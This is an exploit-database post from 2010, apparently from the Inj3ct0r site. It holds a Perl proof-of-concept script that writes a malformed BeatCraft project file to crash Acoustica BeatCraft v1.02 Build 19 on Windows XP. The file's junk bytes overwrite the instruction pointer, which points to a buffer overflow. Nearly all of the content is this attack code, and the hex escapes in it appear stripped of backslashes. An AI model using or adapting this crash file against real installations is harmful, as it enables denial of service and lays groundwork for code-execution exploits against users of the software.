[dos / poc] - Acoustica BeatCraft v1.02 Build 19 Local DoS C
Posted on 13 October 2010
<!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN' 'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'><html xmlns='http://www.w3.org/1999/xhtml'><head><meta http-equiv='Content-Type' content='text/html; charset=utf-8' /><meta http-equiv='Content-Language' content='en' /><title>Acoustica BeatCraft v1.02 Build 19 Local DoS Crash PoC | Inj3ct0r - exploit database : vulnerability : 0day : shellcode</title><meta name='description' content='Acoustica BeatCraft v1.02 Build 19 Local DoS Crash PoC by Anastasios Monachos in dos / poc | Inj3ct0r - exploit database : vulnerability : 0day : shellcode' /><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon' /><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss' /><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></head><body><pre>====================================================== Acoustica BeatCraft v1.02 Build 19 Local DoS Crash PoC ====================================================== #Download: http://www.acoustica.com/beatcraft/download.htm #Tested on Windows XP Pro SP2 (050301-1519) #Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com #Greetz: inj3ct0r and offsec teams #!/usr/bin/perl my $header = "x52x49x46x46x30x79x02x00x62x65x61x74". "x62x70x72x6fx30x02x00x00xcdxccx8cx3f". "x43x3ax5cx41x2ex62x63x70x72x6fx6a"; my $junk ="x50"x499; my $eip ="x41"x4; my $junk2="x59"x42; open (myfile, '>crashpoc.bcproj'); binmode(myfile); print myfile $header.$junk.$eip.$junk2; close (myfile); print " Crash file has been created - crashpoc.bcproj "; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-10-13]</pre></body></html>